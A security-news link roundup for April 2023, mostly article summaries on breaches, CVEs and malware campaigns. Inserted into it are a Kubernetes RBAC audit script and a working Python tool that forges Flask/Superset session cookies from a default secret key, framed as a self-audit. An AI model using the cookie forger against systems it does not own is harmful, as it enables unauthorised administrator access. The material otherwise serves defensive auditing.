This posting is here to collect cyber security news in April 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
352 Comments
Tomi Engdahl says:
ChatGPT Creator OpenAI Ready to Pay Hackers for Security Flaws
OpenAI announced a bug bounty program that will pay hackers up to $20,000 for security vulnerabilities found in ChatGPT and other products and OpenAI corporate assets.
https://www.securityweek.com/chatgpt-creator-openai-ready-to-pay-hackers-via-new-bug-bounty-program/
Tomi Engdahl says:
https://www.securityweek.com/australian-finance-company-refuses-hackers-ransom-demand/
Tomi Engdahl says:
Microsoft Exchange Server 2013 Reaches End of Support
https://www.securityweek.com/microsoft-exchange-server-2013-reaches-end-of-support/
Microsoft Exchange Server 2013 has reached end of support on April 11, 2023, and will no longer receive security patches.
Tomi Engdahl says:
Yum Brands Discloses Data Breach Following Ransomware Attack
https://www.securityweek.com/yum-brands-discloses-data-breach-following-ransomware-attack/
KFC and Taco Bell parent company Yum Brands says personal information was compromised in a January 2023 ransomware attack.
Tomi Engdahl says:
https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-address-dozens-of-vulnerabilities/
Tomi Engdahl says:
https://www.securityweek.com/microsoft-azure-users-warned-of-potential-shared-key-authorization-abuse/
Tomi Engdahl says:
Application Security
Adobe Plugs Gaping Security Holes in Reader, Acrobat
https://www.securityweek.com/adobe-plugs-gaping-security-holes-in-reader-acrobat/
Adobe documents 56 security defects in multiple products, some serious enough to expose Windows and macOS users to code execution attacks.
Tomi Engdahl says:
More specialists are being trained to counter cyber threats, but we are already late, says professor
https://yle.fi/a/74-20026230
The war Russia started in Ukraine has also tightened the cyber security situation. Universities are responding to the shortage of skilled professionals in the field by launching a new collaboration in education.
Tomi Engdahl says:
Here are Finland's most common malware: a nasty banking trojan strikes more and more often
https://www.tivi.fi/uutiset/tv/0223dd5d-e009-4ee3-8744-00b61a9f8541
A malware campaign spreading the Emotet trojan has risen to become the second most common malware in the world. In Finland, Emotet was the third most used malware in March, according to Check Point Research's review. The security company's researchers had already noticed earlier that criminals were looking for new ways to distribute malware after Microsoft announced it would block macros in Office files delivered via email or the internet.
Tomi Engdahl says:
Swedish VPN company raided by police: this is how it went
https://www.tivi.fi/uutiset/tv/38a33aee-b150-47d3-a0b0-55b70ce5f2b7
Swedish VPN provider Mullvad VPN says police raided the company's premises in Gothenburg on Tuesday, April 18.
The police intended to seize machines containing information about customers. According to Mullvad, however, no customer data was leaked. The police had to leave empty-handed after Mullvad's lawyers managed to drive home the core of the company's operating principle: Mullvad wants to protect its customers' privacy, and therefore no customer data is collected. No IP addresses, no network traffic, no timestamps, nothing.
Tomi Engdahl says:
HSL tendered its information security services on price alone: quality is ensured through personnel selection https://www.tivi.fi/uutiset/tv/28448e26-1103-41a0-af3e-8708337e6b7c
In mid-February, Helsinki Region Transport (HSL) completed a competitive tender for a EUR 15 million framework agreement covering information security and data protection expert services. 19 companies submitted bids and seven were accepted. Questions have been raised because the lowest price was the only comparison criterion. Did quality really not matter? Tendering on price alone is based on the idea that when the object of the tender is personnel resources, quality is ensured at the stage of concluding the assignment contract through the selection of individuals.
Tomi Engdahl says:
Exploit released for PaperCut flaw abused to hijack servers, patch now https://www.bleepingcomputer.com/news/security/exploit-released-for-papercut-flaw-abused-to-hijack-servers-patch-now/
Attackers are exploiting severe vulnerabilities in the widely-used PaperCut MF/NG print management software to install Atera remote management software to take over servers. The software’s developer claims it’s used by more than 100 million users from over 70,000 companies worldwide. The two security flaws (tracked as CVE-2023-27350 and CVE-2023-27351) allow remote attackers to bypass authentication and execute arbitrary code on compromised PaperCut servers with SYSTEM privileges in low-complexity attacks that don’t require user interaction
Tomi Engdahl says:
APC warns of critical unauthenticated RCE flaws in UPS software https://www.bleepingcomputer.com/news/security/apc-warns-of-critical-unauthenticated-rce-flaws-in-ups-software/
APC’s Easy UPS Online Monitoring Software is vulnerable to unauthenticated arbitrary remote code execution, allowing hackers to take over devices and, in a worst-case scenario, disabling its functionality altogether. APC (by Schneider Electric) is one of the most popular UPS brands. Its products are widely deployed on both the consumer and corporate markets, including governmental, healthcare, industrial, IT, and retail infrastructure
Tomi Engdahl says:
Vulnerability Spotlight: Vulnerabilities in IBM AIX could lead to command injection with elevated privileges https://blog.talosintelligence.com/vuln-spotlight-ibm-aix-privilege-escalation/
A Cisco security researcher recently discovered two vulnerabilities in the IBM AIX Unix platforms that could be exploited to inject commands and logs into targeted systems with elevated privileges. AIX is a more than 20-year-old set of operating systems for Unix that run on various IBM platforms
Tomi Engdahl says:
Yle: This is how Russia can track the movements of Finns entering the country https://www.is.fi/digitoday/mobiili/art-2000009541247.html
The phone's unique IMEI code enables extensive tracking.
RUSSIA has begun collecting, from Finns entering the country, the IMEI codes that make it possible to track their phones. Visitors to Russia interviewed by Yle have said that several Finns have been interrogated at the border since Finland joined NATO.
An IMEI code is a 15-character device code or serial number of a phone that remains unchanged when the SIM card is replaced. The unique device code allows Russian authorities to track the phone while it is connected to the country's networks, or to disconnect it from the network.
Tomi Engdahl says:
Criminals are no longer after your credit card: this is even more interesting, and more dangerous https://www.is.fi/digitoday/tietoturva/art-2000009470518.html
Gaining access to the email accounts of both companies and individuals enables many kinds of crimes.
Tomi Engdahl says:
More and more websites ask for your email address: here is why https://www.is.fi/digitoday/tietoturva/art-2000009359874.html
The email address has become an increasingly important means of tracking people on the internet, The New York Times reports.
Tomi Engdahl says:
Tim Keary / VentureBeat:
Google announces Google Cloud Security AI Workbench, powered by the Sec-PaLM LLM, to rival tools like Microsoft’s GPT-4-based Security Copilot — Today in the Moscone Center, San Francisco, at RSA Conference 2023 (RSAC), Google Cloud announced Google Cloud Security AI Workbench …
Google releases security LLM at RSAC to rival Microsoft’s GPT-4-based copilot
https://venturebeat.com/security/google-releases-security-llm-at-rsac-to-rival-microsofts-gpt-4-based-copilot/
Today in the Moscone Center, San Francisco, at RSA Conference 2023 (RSAC), Google Cloud announced Google Cloud Security AI Workbench, a security platform powered by Sec-PaLM, a large language model (LLM) designed specifically for cybersecurity use cases.
Sec-PaLM modifies the organization’s existing PaLM model and processes Google’s proprietary threat intelligence data alongside Mandiant’s frontline intelligence to help identify and contain malicious activity, and coordinate response actions.
“Imagine a world where you know, as you’re generating your infrastructure, there’s an auto-generated security policy, security control, or security config that goes along with that,” Eric Doerr, VP of Engineering at Google Cloud, said in an interview with VentureBeat. “That’s one example that we’re working on that we think will be transformative in the world of security operations and security administration.”
One of the tools included as part of Google Cloud Security AI Workbench is VirusTotal Code Insight, released today in preview, which allows a user to import a script and analyze it for malicious behavior.
Another, Mandiant Breach Analytics for Chronicle, entering preview in summer 2023, uses Google Cloud and Mandiant threat intelligence to automatically notify users about breaches, while using Sec-PaLM to find, summarize and respond to threats discovered within the environment.
Kickstarting the defensive generative AI war
The announcement comes as more organizations are beginning to experiment with defensive use cases for generative AI, as part of a market that MarketsandMarkets estimates will reach a value of $51.8 billion by 2028.
One such vendor, SentinelOne, also unveiled a LLM security solution today at RSAC that uses algorithms like GPT-4 to accelerate human-led threat-hunting investigations and orchestrate automated responses.
Another key competitor experimenting with defensive generative AI use cases is Microsoft with Security Copilot, an AI assistant that combines GPT-4 with Microsoft’s proprietary data to process threat signals and create a written summary of potential breach activity.
Other vendors, like cloud security provider Orca Security and Kubernetes security company ARMO, have also begun experimenting with integrations that leverage generative AI to automate SOC operations.
Tomi Engdahl says:
38 Countries Take Part in NATO’s 2023 Locked Shields Cyber Exercise
https://www.securityweek.com/38-countries-take-part-in-natos-2023-locked-shields-cyber-exercise/
More than 3,000 participants from 38 countries took part in NATO's 2023 Locked Shields cyber defense exercise.
Tomi Engdahl says:
Christian Vasquez / CyberScoop:
A group of operational technology cybersecurity vendors launches ETHOS, an open-source portal to share early warnings about threats to critical infrastructure
Industrial security vendors partner to share intelligence about critical infrastructure threats
https://cyberscoop.com/emerging-threat-open-sharing-industrial-cybersecurity/
The biggest companies working in industrial cybersecurity are building an early-warning platform called ETHOS to share threat intelligence.
Some of the largest operational technology cybersecurity vendors are building an open-sourced, opt-in threat intelligence sharing portal to provide early warnings about threats to critical infrastructure.
The platform called Emerging THreat Open Sharing, or ETHOS, is designed to break down information gaps that occur because organizations don’t have access to the same information about the latest hacks or vulnerabilities that could affect the entire energy sector, pipeline operators or other industrial sectors.
“The majority of the threat intelligence is contained within vendor silos,” said Andrea Carcano, co-founder and chief product officer at Nozomi Networks. “We’re not looking to be disruptive from that perspective. We’re looking to elevate the game. Your intelligence will always be limited by what you can see and it doesn’t matter how big your market share is.”
The overall lack of visibility into critical networks has been a longstanding concern in the U.S. Due to this issue, the Biden administration has led multiple “sprints” to increase visibility among various critical industries. The ETHOS effort that includes well-known cybersecurity firms that operate in critical infrastructure space such as 1898 & Co., Dragos, Claroty, Forescout, NetRise, Network Perception, Nozomi Networks, Schneider Electric, Tenable and Waterfall Security is one of the most significant industry initiatives to raise awareness across the entire sector.
The OT-centric, open-source platform for sharing anonymous early warning threat information
https://www.ethos-org.io/
Publicly launched on April 24, 2023, ETHOS is a cooperative development in the OT security industry, with the goal of sharing data to investigate early threat indicators and discover new and novel attacks.
Tomi Engdahl says:
https://www.securityweek.com/symantec-north-korean-3cx-hackers-also-hit-critical-infrastructure-orgs/
Tomi Engdahl says:
https://www.securityweek.com/huntress-most-papercut-installations-not-patched-against-already-exploited-security-flaw/
Tomi Engdahl says:
https://www.securityweek.com/north-korean-hackers-target-mac-users-with-new-rustbucket-malware/
Tomi Engdahl says:
SolarWinds Platform Update Patches High-Severity Vulnerabilities
https://www.securityweek.com/solarwinds-platform-update-patches-high-severity-vulnerabilities/
SolarWinds has patched two high-severity vulnerabilities that could lead to command execution and privilege escalation.
Two high-severity vulnerabilities patched recently in SolarWinds Platform could lead to command execution and privilege escalation.
The most severe of the two issues is CVE-2022-36963 (CVSS score of 8.8), which is described as a command injection bug in SolarWinds’ infrastructure monitoring and management solution.
The flaw, the company explains, can be exploited remotely to execute arbitrary commands. Successful exploitation of the vulnerability requires that the attacker is in the possession of credentials for a valid SolarWinds Platform admin account.
Tracked as CVE-2022-47505 (CVSS score of 7.8), the second high-severity issue is described as a local privilege escalation flaw.
“This vulnerability allows a local adversary with a valid system user account to escalate local privileges,” SolarWinds explains.
Both issues were reported by Trend Micro Zero Day Initiative researchers and both were addressed with the release of SolarWinds Platform version 2023.2.
Tomi Engdahl says:
ICS/OT
Critical Flaw in Inea ICS Product Exposes Industrial Organizations to Remote Attacks
https://www.securityweek.com/critical-flaw-in-inea-ics-product-exposes-industrial-organizations-to-remote-attacks/
Critical vulnerability found in Inea RTU can be exploited to remotely hack devices and cause disruption in industrial organizations.
A critical vulnerability found in a remote terminal unit (RTU) made by Slovenia-based industrial automation company Inea can expose industrial organizations to remote hacker attacks.
The existence of the vulnerability came to light last week, when the US Cybersecurity and Infrastructure Security Agency (CISA) published an advisory to inform organizations. The vendor has released a firmware update that patches the issue.
The security hole, tracked as CVE-2023-2131 with a CVSS score of 10, impacts Inea ME RTUs running firmware versions prior to 3.36. This OS command injection bug could allow remote code execution, CISA said.
The impacted product provides a data interface between remote field devices and the control center through a cellular network. According to CISA, the product is used worldwide in industries such as energy, transportation, and water and wastewater.
Tomi Engdahl says:
Google Cloud Platform Vulnerability Led to Stealthy Account Backdoors
https://www.securityweek.com/google-cloud-platform-vulnerability-led-to-stealthy-account-backdoors/
A vulnerability in Google Cloud Platform allowed attackers to modify and hide OAuth applications to create a stealthy backdoor to any Google account.
A vulnerability in Google Cloud Platform (GCP) could have allowed attackers to maliciously change an OAuth application and hide it to create a stealthy backdoor to any Google account.
Exploitation of the bug, referred to as GhostToken, could have allowed attackers to completely hide the malicious application from the Google user and leverage it to retrieve account tokens to access the victim’s data.
The issue was related to the deletion of OAuth clients, which essentially are GCP projects, app-to-app security firm Astrix, which identified the flaw in June last year, explains.
When a GCP project is deleted – either by the owner or anyone that has the necessary management permissions – the project enters a ‘pending deletion’ state for 30 days, allowing the developer to restore it if necessary.
However, when they are deleted, they are no longer displayed in the Google account application management page, even if they continue to have access to the account.
GhostToken – Exploiting GCP application infrastructure to create invisible, unremovable trojan app on Google accounts
https://astrix.security/ghosttoken-exploiting-gcp-application-infrastructure-to-create-invisible-unremovable-trojan-app-on-google-accounts/
Tomi Engdahl says:
Kubernetes RBAC Exploited in Large-Scale Campaign for Cryptocurrency Mining
https://thehackernews.com/2023/04/kubernetes-rbac-exploited-in-large.html
A large-scale attack campaign discovered in the wild has been exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) to create backdoors and run cryptocurrency miners.
“The attackers also deployed DaemonSets to take over and hijack resources of the K8s clusters they attack,” cloud security firm Aqua said in a report shared with The Hacker News. The Israeli company, which dubbed the attack RBAC Buster, said it found 60 exposed K8s clusters that have been exploited by the threat actor behind this campaign.
The attack chain commenced with the attacker gaining initial access via a misconfigured API server, followed by checking for evidence of competing miner malware on the compromised server, and then using RBAC to set up persistence.
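The persistence step described above (RBAC grants to an attacker-created service account, plus DaemonSets spread across every node) leaves artifacts a defender can audit from two `kubectl` listings. The following is an added example written for this page, not Aqua's code or anything from the report: it reads constructed, trimmed samples shaped like `kubectl get clusterrolebindings -o json` and `kubectl get daemonsets -A -o json` output, flags any cluster-admin binding whose subject is outside an assumed baseline, and flags any DaemonSet container image that does not come from an assumed trusted registry. The binding, service account, DaemonSet and image names in the samples are hypothetical.

```python
"""Audit ClusterRoleBindings and DaemonSets for RBAC-based persistence.

Added example, not from the article or Aqua's report. The JSON below is
constructed test data shaped like kubectl -o json output, trimmed to the
fields the checks read; the names in it are hypothetical.
"""
import json

CONSTRUCTED_CRB_JSON = r"""
{"items": [
  {"metadata": {"name": "cluster-admin"},
   "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
   "subjects": [{"kind": "Group", "name": "system:masters"}]},
  {"metadata": {"name": "system:node-proxier"},
   "roleRef": {"kind": "ClusterRole", "name": "system:node-proxier"},
   "subjects": [{"kind": "User", "name": "system:kube-proxy"}]},
  {"metadata": {"name": "sa-admin-binding"},
   "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
   "subjects": [{"kind": "ServiceAccount", "name": "hypothetical-sa",
                 "namespace": "kube-system"}]}
]}
"""

CONSTRUCTED_DS_JSON = r"""
{"items": [
  {"metadata": {"name": "kube-proxy", "namespace": "kube-system"},
   "spec": {"template": {"spec": {"containers": [
     {"name": "kube-proxy", "image": "registry.k8s.io/kube-proxy:v1.27.1"}]}}}},
  {"metadata": {"name": "hypothetical-miner", "namespace": "kube-system"},
   "spec": {"template": {"spec": {"containers": [
     {"name": "worker", "image": "docker.io/hypothetical/worker:latest"}]}}}}
]}
"""

CRB_DOC = json.loads(CONSTRUCTED_CRB_JSON)
DS_DOC = json.loads(CONSTRUCTED_DS_JSON)

# Assumed baseline: the only subject expected to hold cluster-admin.
EXPECTED_CLUSTER_ADMIN_SUBJECTS = {"Group:system:masters"}
# Assumed baseline: registries DaemonSet images are expected to come from.
TRUSTED_REGISTRIES = ("registry.k8s.io/",)


def subject_id(subject: dict) -> str:
    """Render a binding subject as Kind:namespace/name (namespace only for ServiceAccounts)."""
    ns = subject.get("namespace")
    scope = f"{ns}/" if ns else ""
    return f"{subject['kind']}:{scope}{subject['name']}"


def cluster_admin_outliers(crb_doc: dict, expected=EXPECTED_CLUSTER_ADMIN_SUBJECTS):
    """Return (binding name, subject) pairs that grant cluster-admin outside the baseline."""
    findings = []
    for crb in crb_doc["items"]:
        if crb["roleRef"]["name"] != "cluster-admin":
            continue
        for subj in crb.get("subjects") or []:  # subjects may be absent
            sid = subject_id(subj)
            if sid not in expected:
                findings.append((crb["metadata"]["name"], sid))
    return findings


def daemonset_image_outliers(ds_doc: dict, trusted=TRUSTED_REGISTRIES):
    """Return (namespace, DaemonSet name, image) for containers pulled from untrusted registries.

    An image with no registry prefix (e.g. "nginx") implicitly resolves to
    docker.io and is therefore flagged as well.
    """
    findings = []
    for ds in ds_doc["items"]:
        meta = ds["metadata"]
        for container in ds["spec"]["template"]["spec"].get("containers", []):
            image = container["image"]
            if not image.startswith(trusted):
                findings.append((meta["namespace"], meta["name"], image))
    return findings


if __name__ == "__main__":
    for finding in cluster_admin_outliers(CRB_DOC):
        print("cluster-admin outside baseline:", finding)
    for finding in daemonset_image_outliers(DS_DOC):
        print("DaemonSet image from untrusted registry:", finding)
```

To run this against a real cluster, replace the two constructed documents with the output of `kubectl get clusterrolebindings -o json` and `kubectl get daemonsets -A -o json`, and set the two baselines to what your cluster legitimately uses. The check covers the persistence stage only; the initial access in the campaign was an API server reachable without proper authentication, which is a separate configuration review.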
Tomi Engdahl says:
https://arstechnica.com/information-technology/2023/04/exploit-released-for-9-8-severity-papercut-flaw-already-under-attack/
Tomi Engdahl says:
HUS employee suspected of a serious data security breach affecting the data of hundreds of people https://www.is.fi/digitoday/tietoturva/art-2000009542489.html
An employee of HUS is suspected of a serious data security breach, HUS says. The unauthorized viewing has targeted the data of hundreds of people.
The employee's employment has been terminated, and HUS has filed a request for investigation with the police. The breach came to light in an investigation carried out in cooperation with the authorities. According to the investigation, an accounts receivable clerk who handled customer invoicing had made unjustified searches in both the Population Information System and HUS's patient information systems for years.
Tomi Engdahl says:
Intel CPUs vulnerable to new transient execution side-channel attack https://www.bleepingcomputer.com/news/security/intel-cpus-vulnerable-to-new-transient-execution-side-channel-attack/
A new side-channel attack impacting multiple generations of Intel CPUs has been discovered, allowing data to be leaked through the EFLAGS register. Instead of relying on the cache system like many other side-channel attacks, this new attack leverages a flaw in transient execution that makes it possible to extract secret data from user memory space through timing analysis. The attack works as a side channel to Meltdown, a critical security flaw discovered in 2018, impacting many x86-based microprocessors. Meltdown has been largely mitigated through software patches, microcode updates, and hardware redesigns; however, no solution has addressed the problem 100%, and the latest attack method might work even in fully patched systems depending on hardware, software, and patch configurations
Tomi Engdahl says:
New SLP bug can lead to massive 2,200x DDoS amplification attacks https://www.bleepingcomputer.com/news/security/new-slp-bug-can-lead-to-massive-2-200x-ddos-amplification-attacks/
A new reflective Denial-of-Service (DoS) amplification vulnerability in the Service Location Protocol (SLP) allows threat actors to launch massive denial-of-service attacks with 2,200X amplification. This flaw, tracked as CVE-2023-29552, was discovered by researchers at BitSight and Curesec, who say that over 2,000 organizations are using devices that expose roughly 54,000 exploitable SLP instances for use in DDoS amplification attacks. Vulnerable services include VMWare ESXi Hypervisors, Konica Minolta printers, IBM Integrated Management Modules, and Planex Routers deployed by unsuspecting organizations worldwide
Tomi Engdahl says:
iOS Lockdown Mode effective against NSO zero-click exploit https://www.malwarebytes.com/blog/news/2023/04/ios-lockdown-mode-effective-against-nso-zero-click-exploit
Apple's Lockdown Mode feature alerted a victim to one of the latest NSO exploits, according to a report by Citizen Lab. This is a huge deal since it shows how useful Lockdown Mode can be, even against exploits developed by one of the world's most notorious commercial spyware producers
Tomi Engdahl says:
TP-Link Archer WiFi router flaw exploited by Mirai malware https://www.bleepingcomputer.com/news/security/tp-link-archer-wifi-router-flaw-exploited-by-mirai-malware/
The Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms.
Researchers first abused the flaw during the Pwn2Own Toronto hacking event in December 2022, where two separate hacking teams breached the device using different pathways (LAN and WAN interface access). The flaw was disclosed to TP-Link in January 2023, with TP-Link releasing a fix last month in a new firmware update. The exploitation attempts in the wild were detected by the Zero Day Initiative (ZDI) starting last week, initially focusing on Eastern Europe and spreading worldwide
Tomi Engdahl says:
Google Audit Finds Vulnerabilities in Intel TDX
https://www.securityweek.com/google-audit-finds-vulnerabilities-in-intel-tdx/
Over a nine-month audit, Google researchers identified ten security defects in Intel TDX, including nine vulnerabilities addressed with TDX code changes.
Google this week published the results of a nine-month audit of Intel Trust Domain Extensions (TDX), which resulted in the discovery of ten security defects.
Providing hardware isolated virtual machines, TDX has been added to some Intel Xeon Scalable CPUs to support confidential computing by isolating sensitive resources from the hosting environment.
Focused on identifying any vulnerabilities in Intel’s technology before it entered production, the security review was performed by a team of Google Cloud Security and Project Zero researchers, working together with Intel engineers.
The team identified 81 potential attack vectors and ten confirmed vulnerabilities. Nine of the defects were addressed in the TDX code, while the tenth issue required changes to the guide for writing a BIOS to support TDX. Intel also made five defense-in-depth changes.
The vulnerabilities, Google says, could lead to arbitrary code execution, cryptographic weaknesses, denial-of-service conditions, and weaknesses in debug or deployment facilities.
No CVE identifiers were issued for the discovered bugs, but Intel did assess their severity and assigned a CVSS score of 9.3 to an incorrect handling of interrupts when the Authenticated Code Module (ACM) transitioned from the privileged execution context to an untrusted context.
The flaw could be exploited to execute arbitrary code within the privileged ACM execution mode, compromising both TDX integrity and the security of any deployed virtual machines.
“The review met its expected goals and was able to ensure significant security issues were resolved before the final release of Intel TDX. Overall, the review provided Google with a better understanding of how the TDX feature functions which can be used to guide deployment,” Google says.
“Where possible the review performed variant analysis of any discovered issues to determine if the same pattern could be identified in other areas of the code base. All confirmed issues were mitigated before the production release of the 4th gen Intel Xeon Scalable processors,” Google explains in a detailed report (PDF).
https://services.google.com/fh/files/misc/intel_tdx_-_full_report_041423.pdf
Tomi Engdahl says:
Artificial Intelligence
Insider Q&A: OpenAI CTO Mira Murati on Shepherding ChatGPT
https://www.securityweek.com/insider-qa-openai-cto-mira-murati-on-shepherding-chatgpt/
OpenAI CTO Mira Murati discusses AI safeguards and the company’s vision for the futuristic concept of artificial general intelligence, known as AGI.
Tomi Engdahl says:
The EU is now solving an impossible equation: the outcome affects every citizen's phone https://www.is.fi/digitoday/tietoturva/art-2000009543795.html
The handling of the legislative initiative known as chat control, which arouses STRONG emotions and may change the nature of how the internet works in the EU, takes a step forward in the EU today as the European Parliament gives its response to the bill. The purpose of the law is to advance the fight against child sexual abuse and terrorism on the internet. At the same time, it is feared to break the encryption of instant messengers and other online messaging services and to give the authorities, and possible automated mass surveillance, a master key to internet traffic
Tomi Engdahl says:
Thousands of Apache Superset servers exposed to RCE attacks https://www.bleepingcomputer.com/news/security/thousands-of-apache-superset-servers-exposed-to-rce-attacks/
Apache Superset is vulnerable to authentication bypass and remote code execution at default configurations, allowing attackers to potentially access and modify data, harvest credentials, and execute commands.
Apache Superset is an open-source data visualization and exploration tool initially developed for Airbnb before it became a top-level project at the Apache Software Foundation in 2021. According to a new report by Horizon3, Apache Superset used a default Flask Secret Key to sign authentication session cookies. As a result, attackers can use this default key to forge session cookies that allow them to log in with administrator privileges to servers that did not change the key
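Why a default signing key is a full authentication bypass: Flask's default session interface stores the session as a cookie signed with an HMAC derived from `SECRET_KEY`, so anyone who knows the key can mint a cookie claiming any user. The block below is an added example written for this page, not code from Horizon3, Superset or Flask. It re-implements, with only the standard library, the cookie format Flask's session interface produces (itsdangerous' URL-safe timed serializer with the salt `cookie-session`, HMAC key derivation and SHA-1), so that a defender can take a real `session` cookie from their own instance and test whether it validates under a list of known default keys. `ASSUMED_DEFAULT_KEY` is a hypothetical placeholder, not Superset's shipped value, and `_user_id` is assumed as the login field.

```python
"""Forge and verify Flask-style session cookies to audit for a known SECRET_KEY.

Added example, not from the article, Horizon3, Superset or Flask. It mirrors
the itsdangerous URLSafeTimedSerializer format Flask's SecureCookieSessionInterface
uses (salt "cookie-session", "hmac" key derivation, SHA-1), standard library only.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

SALT = b"cookie-session"  # salt used by Flask's session interface

# Hypothetical stand-in for a key left at its shipped default; not a real value.
ASSUMED_DEFAULT_KEY = b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _signing_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def _encode_payload(data: dict) -> bytes:
    raw = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:  # same rule itsdangerous applies
        return b"." + _b64e(compressed)
    return _b64e(raw)


def _decode_payload(enc: bytes) -> dict:
    if enc.startswith(b"."):
        return json.loads(zlib.decompress(_b64d(enc[1:])))
    return json.loads(_b64d(enc))


def sign_session(secret_key: bytes, data: dict, timestamp: Optional[int] = None) -> str:
    """Produce payload.timestamp.signature exactly as the Flask session cookie is laid out."""
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes(max(1, (ts.bit_length() + 7) // 8), "big")
    value = _encode_payload(data) + b"." + _b64e(ts_bytes)
    sig = hmac.new(_signing_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64e(sig)).decode()


def verify_session(secret_key: bytes, cookie: str) -> Optional[dict]:
    """Return the session dict if the cookie was signed with secret_key, else None.

    Expiry (max_age) is deliberately not checked: for this audit only the
    signature matters.
    """
    value, _, sig = cookie.encode().rpartition(b".")
    expected = hmac.new(_signing_key(secret_key), value, hashlib.sha1).digest()
    try:
        if not hmac.compare_digest(_b64d(sig), expected):
            return None
        payload, _, _ = value.rpartition(b".")
        return _decode_payload(payload)
    except (ValueError, zlib.error):
        return None


def find_known_key(cookie: str, candidate_keys: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate key that validates the cookie; None means none matched."""
    for key in candidate_keys:
        if verify_session(key, cookie) is not None:
            return key
    return None


if __name__ == "__main__":
    # Attacker view: with the default key, a cookie for an assumed user id "1" is one call away.
    forged = sign_session(ASSUMED_DEFAULT_KEY, {"_user_id": "1"})
    print("forged cookie:", forged)
    # Defender view: does a cookie from my deployment validate under a known default?
    hit = find_known_key(forged, [ASSUMED_DEFAULT_KEY])
    print("SECRET_KEY still at a known default" if hit else "no known key matched")
```

For an audit, log in to your own instance, copy the `session` cookie from the browser and pass it to `find_known_key` with the default keys you know of; a match means `SECRET_KEY` was never changed and every session can be forged. Rotating the key invalidates all existing sessions, which is the intended effect.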
Tomi Engdahl says:
Western Digital hit by hackers
https://www.pandasecurity.com/en/mediacenter/security/western-digital/
Last month Western Digital (WD) was hit by a hacker attack. TechCrunch first reported the news on Thursday last week after the cybercriminals contacted the popular blog. WD is known as a Silicon Valley-based American computer drive manufacturer and data storage company. The hackers claim to have more than 10TB of sensitive data stolen from the storage company and are demanding more than $10 million in ransom. The hackers shared a sample of the stolen information with the tech bloggers, who verified its legitimacy
Tomi Engdahl says:
Charming Kitten’s New BellaCiao Malware Discovered in Multi-Country Attacks https://thehackernews.com/2023/04/charming-kittens-new-bellaciao-malware.html
The prolific Iranian nation-state group known as Charming Kitten is actively targeting multiple victims in the U.S., Europe, the Middle East and India with a novel malware dubbed BellaCiao, adding to its ever-expanding list of custom tools. Discovered by Bitdefender Labs, BellaCiao is a “personalized dropper” that’s capable of delivering other malware payloads onto a victim machine based on commands received from an actor-controlled server. “Each sample collected was tied up to a specific victim and included hard-coded information such as company name, specially crafted subdomains, or associated public IP address,” the Romanian cybersecurity firm said in a report shared with The Hacker News
Tomi Engdahl says:
Google disrupts the CryptBot info-stealing malware operation https://www.bleepingcomputer.com/news/security/google-disrupts-the-cryptbot-info-stealing-malware-operation/
Google is taking down malware infrastructure linked to the Cryptbot info stealer after suing those using it to infect Google Chrome users and steal their data. The lawsuit targets Cryptbot’s infrastructure and distribution network, whose disruption would help decrease the number of victims having their sensitive information stolen using the malware. “Yesterday, a federal judge in the Southern District of New York unsealed our civil action against the malware distributors of Cryptbot, which we estimate infected approximately 670,000 computers this past year and targeted users of Google Chrome to steal their data,” the Head of Litigation Advance Mike Trinh and Threat Analysis Group’s Pierre-Marc Bureau said
Tomi Engdahl says:
GuLoader returns with a rotten shipment
https://www.malwarebytes.com/blog/news/2023/04/guloader-returns-with-a-rotten-shipment
GuLoader, a perennial favourite of email-based malware campaigns since 2019, has been seen in the wild once again. GuLoader is a downloader with a chequered history, dating back to somewhere around 2011 in various forms. Two years ago it was one of our most seen malspam attachments. GuLoader is typically used to load in the payload for the campaign in question. It often arrives in a ZIP file, and once opened and the file inside is executed the malicious activity begins. It may attempt to download data stealers, trojans, generic forms of malware, whatever is required. On top of this, GuLoader is designed to evade network detection and sneak past sandbox technology. For example, it may recognise being loaded up inside a virtual testing machine and refuse to load
Tomi Engdahl says:
Black Basta ransomware attacks Yellow Pages Canada https://www.malwarebytes.com/blog/news/2023/04/black-basta-ransomware-attacks-yellow-pages-canada
The Canadian Yellow Pages Group has confirmed it recently became the victim of a cyberattack. The Black Basta ransomware group has claimed responsibility for this attack by posting about Yellow Pages on the Basta News leak site. When such a post shows up, it usually means that negotiations with the victim have stopped and that the ransomware group is getting ready to sell the data it managed to get its hands on during the attack. Based on the most recent leaked information and an outage of the Yellow Pages website Canada 411 at the beginning of April, it is likely the attack occurred between March 15 and April 7.
Attackers using Black Basta have been known to be active on a victim’s network for two to three days before running their ransomware
Tomi Engdahl says:
FIN7 Hackers Caught Exploiting Recent Veeam Vulnerability
https://www.securityweek.com/fin7-hackers-caught-exploiting-recent-veeam-vulnerability/
Russian cybercrime group FIN7 has been observed exploiting a Veeam Backup & Replication vulnerability patched in March 2023.
Russian cybercrime group FIN7 has been observed exploiting unpatched Veeam Backup & Replication instances in recent attacks, cybersecurity company WithSecure reports.
Around since at least 2015 and also referred to as Anunak, and Carbanak, FIN7 is a financially motivated group mainly focused on credit card information theft. Security researchers believe there are numerous sub-groups operating under the FIN7 umbrella.
Over the past years, some of the threat actors overlapping with FIN7 operations were seen transitioning to ransomware, including REvil, DarkSide, BlackMatter, Alphv, and Black Basta.
At the end of March 2023, WithSecure caught FIN7 attacks that exploited internet-facing servers running Veeam Backup & Replication software to execute payloads on the compromised environment.
